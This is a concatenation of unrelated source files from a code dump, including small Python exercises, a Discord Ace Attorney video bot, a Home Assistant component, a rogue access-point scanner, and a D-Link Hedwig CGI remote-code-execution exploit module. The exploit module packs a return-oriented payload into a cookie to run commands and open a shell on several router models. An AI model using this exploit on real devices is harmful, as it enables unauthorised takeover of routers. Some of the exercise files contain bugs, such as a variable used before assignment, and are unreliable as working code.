d9d02a33af01468509cdfe45de0709bdd35a6768 | 9788072f75865aef11a5d0e67020a47b61793486 | /BMI.py | 7ec8854786520d112c8cf4203507b491e3ac0243 | [] | no_license | lokalawashington/-animated-spork-100daysofpython- | d7767a77343dbd0c8d83981d89231b9f7557dda9 | f421ecac04a02d6c7b2a32f5136f17ed1f10c9f7 | refs/heads/master | 2023-04-17T09:30:31.686749 | 2021-05-12T13:27:51 | 2021-05-12T13:27:51 | 366,038,636 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 239 | py | height = input("Enter your height in m: ")
weight = input("Enter your weight in kg: ")
height_new = float(height)
weight_new = int(weight)
BMI = (weight_new/(height_new * height_new))
print(BMI)
BMI_as_int = int(BMI)
print(BMI_as_int)
| [
"lokalawashington2019@gmail.com"
] | lokalawashington2019@gmail.com |
3fcf0c4d584831096040e3c3b747ff1a31794a01 | c329260e4bd92fc177dac49fec9da0a121751e7e | /examples/http/server.py | d8244b3ec1ebfb96cf44fdeac4ae9e150aa9c58f | [
"BSD-2-Clause"
] | permissive | SECEF/python-idmefv2-examples | 2d2ec851bb90bea47cd9a4b59d30aaabb18241a8 | 719b7d78032bc62b4da292db108ecedb70128019 | refs/heads/main | 2023-08-03T03:53:42.476532 | 2021-09-20T15:01:14 | 2021-09-20T15:03:03 | 355,274,002 | 0 | 2 | null | null | null | null | UTF-8 | Python | false | false | 1,228 | py | # Copyright (C) 2021 CS GROUP - France. All Rights Reserved.
# SPDX-License-Identifier: BSD-2-Clause
import sys
import tempfile
from args import parse_args
from idmefv2_transport import get_transport
from os.path import dirname, join
from queue import Queue, Empty
import threading
from http.server import BaseHTTPRequestHandler, HTTPServer
def main(args):
queue = Queue()
transport = get_transport('http://%s/' % args.address, queue, args.mime)
transport.start()
address = "%s:%d" % transport.get_parameter('server_address')
print("READY - You may now start the client like so:", flush=True)
print("\t", sys.executable, join(dirname(__file__), "client.py"), *sys.argv[1:], "--address", address, flush=True)
try:
message = queue.get(timeout=30)
except Empty:
print("No message received", file=sys.stderr)
sys.exit(1)
else:
print("OK:", message)
queue.task_done()
finally:
transport.stop()
queue.join()
if __name__ == '__main__':
args = parse_args("server")
if args.tmpdir is None:
with tempfile.TemporaryDirectory() as tmpdir:
args.tmpdir = tmpdir
main(args)
else:
main(args)
| [
"francois.poirotte@csnovidys.com"
] | francois.poirotte@csnovidys.com |
f7721c25cf493ef1ded4213a2d67b41a3474dcfc | 14b5679d88afa782dc5d6b35878ab043089a060a | /students/贾帅杰/home0529/hachina5.py | 36d8ba5bc9fbfdee8285432c97c1d565fbda2281 | [] | no_license | mutiangua/EIS2020 | c541ef32623f67f9277945cd39cff3c02f06e4dd | 92aa2711b763a2c93be238825c445bf2db8da391 | refs/heads/master | 2022-11-18T05:21:47.567342 | 2020-07-11T10:11:21 | 2020-07-11T10:11:21 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,617 | py | # 引入datetime库用于方便时间相关计算
from datetime import timedelta
import logging
import voluptuous as vol
# 引入HomeAssitant中定义的一些类与函数
# track_time_interval是监听时间变化事件的一个函数
from homeassistant.helpers.event import track_time_interval
import homeassistant.helpers.config_validation as cv
DOMAIN = "hachina5"
ENTITYID = DOMAIN + ".hello_world"
CONF_STEP = "step"
DEFAULT_STEP = 3
#f=open("C:\\Users\\23004\\AppData\\Roaming\\.homeassistant\\custom_components\\num.txt", "r")
# 定义时间间隔为3秒钟
TIME_BETWEEN_UPDATES = timedelta(seconds=1)
_LOGGER = logging.getLogger(__name__)
CONFIG_SCHEMA = vol.Schema(
{
DOMAIN: vol.Schema(
{
# 一个配置参数“step”,只能是正整数,缺省值为3
vol.Optional(CONF_STEP, default=DEFAULT_STEP): cv.positive_int,
}),
},
extra=vol.ALLOW_EXTRA)
def setup(hass, config):
"""配置文件加载后,setup被系统调用."""
conf = config[DOMAIN]
step = conf.get(CONF_STEP)
_LOGGER.info("Get the configuration %s=%d",
CONF_STEP, step)
attr = {"icon": "mdi:yin-yang",
"friendly_name": "Door",
"slogon": "积木构建智慧空间!",
"unit_of_measurement": ""}
# 构建类GrowingState
GrowingState(hass, step, attr)
return True
class GrowingState(object):
"""定义一个类,此类中存储了状态与属性值,并定时更新状态."""
def __init__(self, hass, step, attr):
"""GrwoingState类的初始化函数,参数为hass、step和attr."""
# 定义类中的一些数据
self._hass = hass
self._step = step
self._attr = attr
self._state = 0
# 在类初始化的时候,设置初始状态
self._hass.states.set(ENTITYID, self._state, attributes=self._attr)
# 每隔一段时间,更新一下实体的状态
track_time_interval(self._hass, self.update, TIME_BETWEEN_UPDATES)
def update(self, now):
f=open("C:\Apache24\htdocs\\index.html", "r")
data = f.read() # 读取文件
#datas=data[-4:]
"""在GrowingState类中定义函数update,更新状态."""
_LOGGER.info("GrowingState is "+data)
# 状态值每次增加step
self._state = self._state + self._step
# 设置新的状态值
self._hass.states.set(ENTITYID, data, attributes=self._attr)
| [
"noreply@github.com"
] | noreply@github.com |
29034d4f7c58604dbb015618f3e88de8331a7636 | 5f01de2a024c21323d6c6f02be114edf45ba0775 | /Lessen/oude opdrachten/Les 2/final assignmenst 2.py | f684d0d37aa176384dc874727f78e2a58bb4632d | [] | no_license | KishanSewnath/Python | 03bd8dd11fde9fad9095773a36cfe81a5b310c96 | fe2723205cb331f9532c288ee373eba8779dffbf | refs/heads/master | 2021-05-03T11:27:51.262623 | 2016-11-02T12:50:26 | 2016-11-02T12:51:22 | 69,969,619 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 278 | py | lst = ['aap', 'noot', 'mies', 'blaa', 'fooo', 'bar', 'bnb']
beginIndex = 3
eindIndex = 6
totaal = 0
for indexWoord in range(beginIndex, eindIndex + 1):
lengteWoord = len(woord)
woord = lst[indexWoord ]
totaal = totaal + lengteWoord
print(woord)
print(totaal)
| [
"kishan.sewnath@student.hu.nl"
] | kishan.sewnath@student.hu.nl |
c23dd5e12ae719e7b4616d5f20ac6bbd59a2fadb | 4073f351551c2f73c5659cb3038a68360cc5b369 | /Lärobok/kap 6/kap. 6, sid. 76 - sätta ihop strängar.py | a6ec6841d16836e6f2de9f964e810fd69f375383 | [
"MIT"
] | permissive | Pharou/programmering1python | b9a5aca72354d3e7e91a5023a621d22a962ecd7c | 9b689027db1f7fbf06925f3094fcb126880453e4 | refs/heads/master | 2022-11-28T06:33:17.295157 | 2020-07-25T11:02:07 | 2020-07-25T11:02:07 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 572 | py | #!/usr/bin/python3.8
# Filnamn: kap. 6, sid. 76 - sätta ihop strängar.py
# Programmering 1 med Python - Lärobok
# Kapitel 6 - Mer om teckensträngar i Python
# Med plustecken kan du slå samman flera strängar till en enda.
# Det kallas även konkatenering av strängar
fn = 'Tage'
ln = 'Test'
name = fn + ln
print(name)
# Som du ser så skrivs inget mellanslag ut i den första print-satsen,
# det måste du manuellt lägga in själv
name = fn + ' ' + ln
print(name)
# Upprepning av strängar görs med multiplikationstecknet *
print(3 * 'Hola!')
print(15 * '-') | [
"niklas_engvall@hotmail.com"
] | niklas_engvall@hotmail.com |
d1dd96e68af28543c90ca88f0a73aba302923913 | e824b1a37f72bfc182007217294e162f1317315c | /warmpup/lonely_integer/lonely.py | 5c28ae428658a561b9a33ab080f875e153ed57dd | [] | no_license | guiambros/hackerrank | 6428d1c78ada4d04bcd0e1f495edfa0bdc411d83 | 5ff5231526a1929fac993ca03ab231cbb4c5f300 | refs/heads/master | 2021-01-25T04:50:27.601947 | 2015-02-16T06:37:35 | 2015-02-16T06:37:35 | 30,397,719 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 886 | py | #!/usr/bin/python
# There are N integers in an array A. All but one integer occur in pairs. Your task is to find out the number that occurs only once.
#
# The first line of the input contains an integer N indicating the number of integers.
# The next line contains N space separated integers that form the array A.
#
# Output S, the number that occurs only once.
import sys
DEBUG = False
if (DEBUG): fp=open('input.txt')
def print_debug(str):
if (DEBUG): print "DEBUG: " + str
return
def read_input():
if (DEBUG):
ret=map(int, fp.readline().split(' '))
else:
ret=map(int, sys.stdin.readline().split(' '))
return ret
def main():
N = read_input()
A = read_input()
d = {}
for i in A:
if i in d: d[i] = d[i]+1
else: d[i] = 1
print d.keys()[d.values().index(1)]
if __name__ == '__main__':
main()
| [
"gui@wrgms.com"
] | gui@wrgms.com |
2c5bad20f3963b0a05c987b18b93b70740c5217f | 543e4a93fd94a1ebcadb7ba9bd8b1f3afd3a12b8 | /maza/modules/exploits/routers/dlink/multi_hedwig_cgi_exec.py | cda6380b6efab9cd5609c5c1aeab67de8cb19247 | [
"MIT"
] | permissive | ArturSpirin/maza | e3127f07b90034f08ff294cc4afcad239bb6a6c3 | 56ae6325c08bcedd22c57b9fe11b58f1b38314ca | refs/heads/master | 2020-04-10T16:24:47.245172 | 2018-12-11T07:13:15 | 2018-12-11T07:13:15 | 161,144,181 | 2 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,810 | py | import struct
from maza.core.exploit import *
from maza.core.http.http_client import HTTPClient
class Exploit(HTTPClient):
__info__ = {
"name": "D-Link Hedwig CGI RCE",
"description": "Module exploits buffer overflow vulnerablity in D-Link Hedwig CGI component, "
"which leads to remote code execution.",
"authors": (
"Austin <github.com/realoriginal>", # routersploit module
),
"references": (
"http://securityadvisories.dlink.com/security/publication.aspx?name=SAP10008",
"http://www.dlink.com/us/en/home-solutions/connect/routers/dir-645-wireless-n-home-router-1000",
"http://roberto.greyhats.it/advisories/20130801-dlink-dir645.txt",
"https://www.exploit-db.com/exploits/27283/",
),
"devices": (
"D-Link DIR-645 Ver. 1.03",
"D-Link DIR-300 Ver. 2.14",
"D-Link DIR-600",
),
}
target = OptIP("", "Target IPv4 or IPv6 address")
port = OptPort(80, "Target HTTP port")
def run(self):
if self.check():
print_success("Target is vulnerable")
shell(self, architecture="mipsle", method="echo", location="/tmp",
echo_options={"prefix": "\\\\x"}, exec_binary="chmod 777 {0} && {0} && rm {0}")
else:
print_error("Target is not vulnerable")
def execute(self, cmd):
cmd = cmd.encode("utf-8")
libcbase = 0x2aaf8000
system = 0x000531FF
calcsystem = 0x000158C8
callsystem = 0x000159CC
shellcode = utils.random_text(973).encode("utf-8")
shellcode += struct.pack("<I", libcbase + system)
shellcode += utils.random_text(16).encode("utf-8")
shellcode += struct.pack("<I", libcbase + callsystem)
shellcode += utils.random_text(12).encode("utf-8")
shellcode += struct.pack("<I", libcbase + calcsystem)
shellcode += utils.random_text(16).encode("utf-8")
shellcode += cmd
headers = {
"Content-Type": "application/x-www-form-urlencoded",
"Cookie": b"uid=" + shellcode + b";"
}
data = {
utils.random_text(7): utils.random_text(7)
}
response = self.http_request(
method="POST",
path="/hedwig.cgi",
headers=headers,
data=data,
)
if response is None:
return ""
return response.text[response.text.find("</hedwig>") + len("</hedwig>"):].strip()
@mute
def check(self):
fingerprint = utils.random_text(10)
cmd = "echo {}".format(fingerprint)
response = self.execute(cmd)
if fingerprint in response:
return True
return False
| [
"a.spirin@hotmail.com"
] | a.spirin@hotmail.com |
adf39be48cd84696b0a4931048eca7f235b9f4cb | 9ba2de52538216c2ee3636c199ce04d2352d9b68 | /main.py | 98939b1e5646a98a4874424ab59f9c4c4a13762d | [] | no_license | manncodes/ace-bot | f8a5d3f07b268e0323432f18da0574a8a811436a | 8d132ac6a77634b130499cd5fa39a1cdad3b92f3 | refs/heads/main | 2023-06-05T12:53:43.516320 | 2021-06-29T15:21:54 | 2021-06-29T15:21:54 | 381,407,004 | 0 | 1 | null | null | null | null | UTF-8 | Python | false | false | 14,772 | py | import discord
import os
import random
import requests
import sys
import threading
import time
import yaml
sys.path.append("./objection_engine")
from deletion import Deletion
from discord.ext import commands, tasks
from message import Message
from objection_engine.beans.comment import Comment
from objection_engine.renderer import render_comment_list
from render import Render, State
from typing import List
# Global Variables:
renderQueue = []
deletionQueue = []
def loadConfig():
try:
with open("config.yaml") as file:
config = yaml.load(file, Loader=yaml.FullLoader)
global token, prefix, deletionDelay
token = config["token"].strip()
if not token:
raise Exception("The 'token' field is missing in the config file (config.yaml)!")
prefix = config["prefix"].strip()
if not prefix:
raise Exception("The 'prefix' field is missing in the config file (config.yaml)!")
deletionDelay = config["deletionDelay"].strip()
if not deletionDelay:
raise Exception("The 'deletionDelay' field is missing in the config file (config.yaml)!")
return True
except KeyError as keyErrorException:
print(f"The mapping key {keyErrorException} is missing in the config file (config.yaml)!")
except Exception as exception:
print(exception)
return False
if not loadConfig():
exit()
courtBot = commands.AutoShardedBot(command_prefix=prefix, Intents=discord.Intents.default())
# Default 'help' command is removed, we will make our own
courtBot.remove_command("help")
currentActivityText = f"{prefix}help"
async def changeActivity(newActivityText):
try:
global currentActivityText
if currentActivityText == newActivityText:
return
else:
newActivity = discord.Game(newActivityText)
await courtBot.change_presence(activity=newActivity)
currentActivityText = newActivityText
print(f"Activity was changed to {currentActivityText}")
except Exception as exception:
print(f"Error: {exception}")
def addToDeletionQueue(message: discord.Message):
# Only if deletion delay is grater than 0, add it to the deletionQueue.
if int(deletionDelay) > 0:
newDeletion = Deletion(message, int(deletionDelay))
deletionQueue.append(newDeletion)
@courtBot.event
async def on_message(message):
if message.author is courtBot.user or message.author.bot:
return
if message.channel.type is discord.ChannelType.private:
embedResponse = discord.Embed(description="I won't process any messages via PM.\nIf you have any problems, please go to [the support server](https://discord.gg/pcS4MPbRDU).", color=0xff0000)
await message.channel.send(embed=embedResponse)
return
await courtBot.process_commands(message)
@courtBot.command()
async def help(context):
dummyAmount = random.randint(2, 150)
helpEmbed = discord.Embed(description="Discord bot that turns message chains into ace attorney scenes.\nIf you have any problems, please go to [the support server](https://discord.gg/pcS4MPbRDU).", color=0x3366CC, footer="Do not include these symbols (\"<\" and \">\") when using this command")
helpEmbed.set_author(name=courtBot.user.name, icon_url=courtBot.user.avatar_url)
helpEmbed.add_field(name="How to use?", value=f"`{prefix}render <number_of_messages>`", inline=False)
helpEmbed.add_field(name="Example", value=f"Turn the last {dummyAmount} messages into an ace attorney scene: `{prefix}render {dummyAmount}`", inline=False)
helpEmbed.add_field(name="Starting message", value="By default the bot will load the specified number of messages from the last message (before using the command) going backwards, if you want the message count to start from another message, reply to it when using the command.", inline=False)
helpMessage = await context.send(embed=helpEmbed)
addToDeletionQueue(helpMessage)
# This command is only for the bot owner, it will ignore everybody else
@courtBot.command()
@commands.is_owner()
async def queue(context):
filename = "queue.txt"
with open(filename, 'w', encoding="utf-8") as queue:
global renderQueue
renderQueueSize = len(renderQueue)
queue.write(f"There are {renderQueueSize} item(s) in the queue!\n")
for positionInQueue, render in enumerate(iterable=renderQueue):
queue.write(f"\n#{positionInQueue:04}\n")
try: queue.write(f"Requested by: {render.getContext().author.name}#{render.getContext().author.discriminator}\n")
except: pass
try: queue.write(f"Number of messages: {len(render.getMessages())}\n")
except: pass
try: queue.write(f"Guild: {render.getFeedbackMessage().channel.guild.name}\n")
except: pass
try: queue.write(f"Channel: #{render.getFeedbackMessage().channel.name}\n")
except: pass
try: queue.write(f"State: {render.getStateString()}\n")
except: pass
await context.send(file=discord.File(filename))
clean([], filename)
@courtBot.command()
async def render(context, numberOfMessages: int):
global renderQueue
petitionsFromSameGuild = [x for x in renderQueue if x.context.guild.id == context.guild.id]
petitionsFromSameUser = [x for x in renderQueue if x.context.user.id == context.user.id]
if (len(petitionsFromSameGuild) > 5):
raise Exception("Only up to five renders per guild are allowed")
if (len(petitionsFromSameUser) > 3):
raise Exception("Only up to three renders per user are allowed")
feedbackMessage = await context.send(content="`Fetching messages...`")
try:
if not (numberOfMessages in range(1, 151)):
raise Exception("Number of messages must be between 1 and 150")
# baseMessage is the message from which the specified number of messages will be fetch, not including itself
baseMessage = context.message.reference.resolved if context.message.reference else context.message
courtMessages = []
discordMessages = []
# If the render command was executed within a reply (baseMessage and context.Message aren't the same), we want
# to append the message the user replied to (baseMessage) to the 'discordMessages' list and substract 1 from
# 'numberOfMessages' that way we are taking the added baseMessage into consideration and avoid getting 1 extra message)
if not baseMessage.id == context.message.id:
numberOfMessages = numberOfMessages - 1
discordMessages.append(baseMessage)
# This will append all messages to the already existing discordMessages, if the message was a reply it should already
# include one message (the one it was replying to), if not: it will be empty at this point.
discordMessages += await context.channel.history(limit=numberOfMessages, oldest_first=False, before=baseMessage).flatten()
for discordMessage in discordMessages:
message = Message(discordMessage)
if message.text.strip():
courtMessages.insert(0, message.to_Comment())
if len(courtMessages) < 1:
raise Exception("There should be at least one person in the conversation.")
newRender = Render(State.QUEUED, context, feedbackMessage, courtMessages)
renderQueue.append(newRender)
except Exception as exception:
exceptionEmbed = discord.Embed(description=str(exception), color=0xff0000)
await feedbackMessage.edit(content="", embed=exceptionEmbed)
addToDeletionQueue(feedbackMessage)
@tasks.loop(seconds=1)
async def deletionQueueLoop():
global deletionQueue
deletionQueueSize = len(deletionQueue)
# Delete message and remove from queue if remaining time is less than (or equal to) 0
if deletionQueueSize > 0:
for index in reversed(range(deletionQueueSize)):
if await deletionQueue[index].update():
deletionQueue.pop(index)
@tasks.loop(seconds=5)
async def renderQueueLoop():
global renderQueue
renderQueueSize = len(renderQueue)
await changeActivity(f"{prefix}help | queue: {renderQueueSize}")
for positionInQueue, render in enumerate(iterable=renderQueue, start=1):
try:
if render.getState() == State.QUEUED:
newFeedback = f"""
`Fetching messages... Done!`
`Position in the queue: #{(positionInQueue)}`
"""
await render.updateFeedback(newFeedback)
if render.getState() == State.INPROGRESS:
newFeedback = f"""
`Fetching messages... Done!`
`Your video is being generated...`
"""
await render.updateFeedback(newFeedback)
if render.getState() == State.FAILED:
newFeedback = f"""
`Fetching messages... Done!`
`Your video is being generated... Failed!`
"""
await render.updateFeedback(newFeedback)
render.setState(State.DONE)
if render.getState() == State.RENDERED:
newFeedback = f"""
`Fetching messages... Done!`
`Your video is being generated... Done!`
`Uploading file to Discord...`
"""
await render.updateFeedback(newFeedback)
render.setState(State.UPLOADING)
# If the file size is lower than the maximun file size allowed in this guild, upload it to Discord
fileSize = os.path.getsize(render.getOutputFilename())
if fileSize < render.getContext().channel.guild.filesize_limit:
await render.getContext().send(content=render.getContext().author.mention, file=discord.File(render.getOutputFilename()))
render.setState(State.DONE)
newFeedback = f"""
`Fetching messages... Done!`
`Your video is being generated... Done!`
`Uploading file to Discord... Done!`
"""
await render.updateFeedback(newFeedback)
else:
try:
newFeedback = f"""
`Fetching messages... Done!`
`Your video is being generated... Done!`
`Video file too big for you server! {round(fileSize/1000000, 2)} MB`
`Trying to upload file to an external server...`
"""
await render.updateFeedback(newFeedback)
with open(render.getOutputFilename(), 'rb') as videoFile:
files = {'files[]': (render.getOutputFilename(), videoFile)}
response = requests.post('https://uguu.se/upload.php?output=text', files=files).content.decode("utf-8").strip()
newFeedback = f"""
`Fetching messages... Done!`
`Your video is being generated... Done!`
`Video file too big for you server! {round(fileSize/1000000, 2)} MB`
`Trying to upload file to an external server... Done!`
"""
await render.updateFeedback(newFeedback)
await render.getContext().send(content=f"{render.getContext().author.mention}\n{response}\n_This video will be deleted in 48 hours_")
render.setState(State.DONE)
except Exception as exception:
newFeedback = f"""
`Fetching messages... Done!`
`Your video is being generated... Done!`
`Video file too big for you server! {round(fileSize/1000000, 2)} MB`
`Trying to upload file to an external server... Failed!`
"""
await render.updateFeedback(newFeedback)
exceptionEmbed = discord.Embed(description=exception, color=0xff0000)
exceptionMessage = await render.getContext().send(embed=exceptionEmbed)
addToDeletionQueue(exceptionMessage)
render.setState(State.DONE)
except Exception as exception:
print(f"Error: {exception}")
try:
render.setState(State.DONE)
except:
pass
finally:
if render.getState() == State.DONE:
clean(render.getMessages(), render.getOutputFilename())
addToDeletionQueue(render.getFeedbackMessage())
# Remove from queue if state is DONE
if renderQueueSize > 0:
for index in reversed(range(renderQueueSize)):
if renderQueue[index].getState() == State.DONE:
renderQueue.pop(index)
@courtBot.event
async def on_ready():
global currentActivityText
print("Bot is ready!")
print(f"Logged in as {courtBot.user.name}#{courtBot.user.discriminator} ({courtBot.user.id})")
currentActivityText = f"{prefix}help"
renderQueueLoop.start()
deletionQueueLoop.start()
def clean(thread: List[Comment], filename):
try:
os.remove(filename)
except Exception as exception:
print(f"Error: {exception}")
try:
for comment in thread:
if (comment.evidence_path is not None):
os.remove(comment.evidente_path)
except Exception as exception:
print(f"Error: {exception}")
def renderThread():
global renderQueue
while True:
time.sleep(2)
try:
for render in renderQueue:
if render.getState() == State.QUEUED:
render.setState(State.INPROGRESS)
try:
render_comment_list(render.getMessages(), render.getOutputFilename())
render.setState(State.RENDERED)
except Exception as exception:
print(f"Error: {exception}")
render.setState(State.FAILED)
finally:
break
except Exception as exception:
print(f"Error: {exception}")
backgroundThread = threading.Thread(target=renderThread, name="RenderThread")
backgroundThread.start()
courtBot.run(token)
backgroundThread.join()
| [
"manncodes@gmail.com"
] | manncodes@gmail.com |
91dcf081ba91231f27d967ba1acc3391a6f0db0c | e84b4eeb10a568a6a2e6283b86444358c49b6fbf | /setup.py | 8fa0a35b13068fe79fe6d06441983cb07399dc61 | [
"MIT"
] | permissive | jeffypooo/agent-finder | e002b39b513755ebf28a5f19a8581a8b237ec37f | 103f41f5c77bd9b4f5c42aed805442fad88e5f7f | refs/heads/master | 2022-09-13T09:25:43.156024 | 2019-11-14T22:02:42 | 2019-11-14T22:02:42 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 872 | py | import setuptools
with open("README.md", "r") as fh:
long_description = fh.read()
setuptools.setup(
name="agent-finder-masterjefferson",
version="0.2",
author="Jefferson Jones",
author_email="jeffersonmjones92@gmail.com",
description="Find nearby auto insurance agents and dump them to a CSV file.",
long_description=long_description,
long_description_content_type="text/markdown",
url="https://github.com/masterjefferson/agent-finder",
packages=setuptools.find_packages(),
entry_points={
'console_scripts': [
'agent-finder = finder.finder:main'
]
},
install_requires=[
'googlemaps'
],
classifiers=[
"Programming Language :: Python :: 3",
"License :: OSI Approved :: MIT License",
"Operating System :: MacOS",
],
python_requires='>=3.7.5',
)
| [
"jeff@beartooth.com"
] | jeff@beartooth.com |
834b1d7e8be891e345f7c11b0a22ff8a44e36725 | 039e3eb784605c3c4cc69027f236287671ed2cc8 | /rogue_device/rogue_device.py | 5b8dd976c62b00a79054421520d4b6660a6a38d2 | [] | no_license | WirelessProject/ruckuscli | 52c195898339948cba20693fb6e58c5bafb2580e | 6c39f0bd0f19cb9e2444e4d89d8015f05f96daa5 | refs/heads/master | 2021-09-11T13:45:00.139505 | 2018-04-08T06:28:32 | 2018-04-08T06:28:32 | 111,395,363 | 0 | 1 | null | null | null | null | UTF-8 | Python | false | false | 6,358 | py | #!/usr/bin/env python
import datetime
import pexpect
import getpass
import re
import smtplib
import time
from time import localtime, strftime
from termcolor import colored
username = ''
password = ''
fromaddr = ''
toaddrs = ''
rogue_device_detected = 0
_time = 0
log_in_account = ''
log_in_password = '' # Password
def mailing(device):
server = smtplib.SMTP('smtp.gmail.com:587')
server.ehlo()
server.starttls()
msg = "\r\n".join([
"From: user_me@gmail.com",
"To: user_you@gmail.com",
"Subject: csie Rogue Device discovered !!!",
"Mac = %s" % (device['Mac']),
"Channel = %s" % (device['Channel']),
"Radio = %s " %(device['Radio']),
"Type = %s" % (device['Type']),
"Encryption = %s" % (device['Encryption']),
"SSID = %s" % (device['SSID']),
"Last_Detected = %s" %(device['Last_Detected']),
])
server.login(username,password)
server.sendmail(fromaddr, toaddrs, msg)
server.quit()
def main():
p = pexpect.spawn('ssh wifi.csie.ntu.edu.tw')
print(strftime("%Y-%m-%d %H:%M:%S", localtime()), 'Login to ZD')
p.expect('Please login:')
p.sendline(log_in_account) # Usename
p.sendline(log_in_password) # Password
print(strftime("%Y-%m-%d %H:%M:%S", localtime()), 'Login succeeded')
p.expect('ruckus>')
p.sendline('enable') # Enable mode
idx = p.expect(['ruckus#', 'A privileged user is already logged in.'])
if idx != 0: # Someone already in.
print(strftime("%Y-%m-%d %H:%M:%S", localtime()),
'A privileged user is already logged in, try in the next cycle.')
p.sendline('exit')
p.close()
return
p.sendline('show wlan-group all')
p.expect('ruckus#')
data = p.before
data = data.split('WLAN Service:')[1:]
# get valid SSIDs
valid_SSID = []
for i in (data):
tmp = re.findall('NAME= (\S+)\r\r\n', i)[0]
if not tmp:
continue
valid_SSID.append(tmp)
# this line is for testing
# valid_SSID.append('NTU')
p.sendline('show rogue-devices')
p.expect('Current Active Rogue Devices:\r\r\n')
p.expect('ruckus#')
data = p.before
entries = re.split('Rogue Devices:\r\r\n', data.decode('utf-8'))[1:]
rogue_devices = []
for entry in entries:
#check for empty line
if len(re.findall('Mac Address= (\S+)\r\r\n', entry)) == 0:
continue
Mac = re.findall('Mac Address= (\S+)\r\r\n', entry)[0]
Channel = re.findall('Channel= (\S+)\r\r\n',entry)[0]
Radio = re.findall('Radio= (\S+)\r\r\n',entry)[0]
Type = re.findall('Type= (\S+)\r\r\n',entry)[0]
Encryption = re.findall('Encryption= (\S+)\r\r\n',entry)[0]
#check for empty SSID
###assume SSID is at most two segments seperated by spaces!!!!!
if len(re.findall('SSID= (\S+)\r\r\n',entry)) != 0:
if len(re.findall('SSID= (\S+ \S+)\r\r\n',entry)) == 0:
SSID = re.findall('SSID= (\S+)\r\r\n',entry)[0]
else:
SSID = re.findall('SSID= (\S+ \S+)\r\r\n',entry)[0]
else:
SSID = []
Last_Detected = re.findall('Last Detected= (\S+ \S+)\r\r\n',entry)[0]
rogue_devices.append({
'Mac' : Mac,
'Channel': Channel,
'Radio' : Radio,
'Type' : Type,
'Encryption' : Encryption,
'SSID' : SSID,
'Last_Detected' : Last_Detected,
})
for device in rogue_devices:
if device['SSID'] in valid_SSID :
rogue_device_detected = 1
print(colored(strftime("%Y-%m-%d %H:%M:%S", localtime()) + ' Rogue device detected, mailing','red',attrs = ['bold']))
try:
mailing(device)
except smtplib.SMTPException:
print(colored(strftime("%Y-%m-%d %H:%M:%S", localtime())+ ' Mailing failed !!!!!!','red',attrs = ['bold']))
p.sendline('exit')
p.close()
print(strftime("%Y-%m-%d %H:%M:%S", localtime()), 'Logout from ZD')
if __name__ == '__main__':
_time = int(raw_input('Please Enter the interval(minute) between cycles: '))
server = smtplib.SMTP('smtp.gmail.com:587')
server.starttls()
#get zd account
while True:
try:
log_in_account = raw_input('Please login: ') # username
log_in_password = getpass.getpass('Password: ') # Password
p = pexpect.spawn('ssh 10.3.7.253')
p.expect('Please login:')
p.sendline(log_in_account) # Usename
p.sendline(log_in_password) # Password
p.expect('ruckus>',timeout = 1)
p.sendline('exit')
p.close()
break
except pexpect.TIMEOUT:
print("your username or password is incorrect, please try again")
#get user gmail account,zd account
while True:
try:
username = raw_input('Please Enter your Gmail Account: ')
password = getpass.getpass('Password: ')
server.login(username,password)
break
except smtplib.SMTPException:
print("your username or password is incorrect, please try again")
continue
fromaddr = 'zone director';
toaddrs = raw_input('Please Enter your Gmail toaddr: ')
print(strftime("%Y-%m-%d %H:%M:%S", localtime()), 'Start')
#start scanning for rogue devices
while True:
try:
print(strftime("%Y-%m-%d %H:%M:%S", localtime()), 'Start scanning for rogue devices')
rogue_device_detected = 0
main()
except pexpect.TIMEOUT:
print(strftime("%Y-%m-%d %H:%M:%S", localtime()),'Timeout.')
time.sleep(60*_time)
if rogue_device_detected == 0:
print(strftime("%Y-%m-%d %H:%M:%S", localtime()),'Finish scanning, no rogue device detected')
else:
print(colored(strftime("%Y-%m-%d %H:%M:%S", localtime())+' Finish scanning, some rogue devices detected!!!','red',attrs = ['bold']))
server.quit()
print(datetime.datetime.now().isoformat(), 'End')
| [
"y60091534@gmail.com"
] | y60091534@gmail.com |
b536f3f4b4dacb8735de899950a24df3f163176b | bfbef414923883abc522dc064feafb730ce3b34c | /advance_python_obj_and_data_structure/file_handle_exception.py | c6ec45c8ea460faa74be32c04b67d8b657295d49 | [
"MIT"
] | permissive | alok-kumar8765/basic_python_practicse | ad5168fa3e8bcf4380d3f395d3dd76cb8d3faff5 | 9bd61f0b03fc1e703a75df39862a24692bb3fdb7 | refs/heads/main | 2023-07-26T01:46:36.168099 | 2021-09-03T06:10:40 | 2021-09-03T06:10:40 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 379 | py | '''
p=open('oops.txt','a')
p.readlines()
p.close()
#let modify file
p.write('add more text')
p.close()
'''
#protect file with try/except/finally
p=open('oops.txt','a')
try:
p.readlines()
except:
print('an exception raised')
finally:
p.close()
p.write('add more text')
# save step with with
with open('oops.txt','a') as p:
p.readlines()
p.write('add more text') | [
"85283226+alok-techqware@users.noreply.github.com"
] | 85283226+alok-techqware@users.noreply.github.com |
6a1d90a4e97b59248f282e363faf44e729a3aa2c | 4cb06a6674d1dca463d5d9a5f471655d9b38c0a1 | /rad416/Assignment4/tutorial3.py | 2ebb5beab5697193697389f89172bd983812751d | [] | no_license | nyucusp/gx5003-fall2013 | 1fb98e603d27495704503954f06a800b90303b4b | b7c1e2ddb7540a995037db06ce7273bff30a56cd | refs/heads/master | 2021-01-23T07:03:52.834758 | 2013-12-26T23:52:55 | 2013-12-26T23:52:55 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 588 | py | import MySQLdb
#connect to database
db = MySQLdb.connect(host="localhost", # your host, usually localhost
user="rad416", # your username
passwd="mysql", # your password
db="coursedb") # name of the data base
# The Cursor object will let you execute the sql commands
cur = db.cursor()
# query all rows were age < 25
query = "SELECT * FROM test WHERE age < 25"
cur.execute(query)
#process the result
for row in cur.fetchall():
print str(row[0]) + " " + row[1] + " " + str(row[2])
#close connection
db.close() | [
"richarddunks@gmail.com"
] | richarddunks@gmail.com |
